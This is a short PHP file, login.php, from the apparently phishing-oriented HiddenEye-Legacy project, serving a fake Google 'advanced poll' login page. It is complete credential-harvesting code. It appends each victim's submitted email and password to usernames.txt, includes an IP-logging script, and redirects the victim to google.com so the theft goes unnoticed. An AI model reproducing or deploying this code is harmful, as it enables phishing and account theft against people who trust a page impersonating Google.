HiddenEye-Legacy/WebPages/google_advanced_poll/login.php
Usama Abdul Sattar 2354b51726
Update login.php
2018-06-07 14:20:42 +05:00

8 lines
212 B
PHP

<?php
include 'base.php';
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://google.com/');
exit();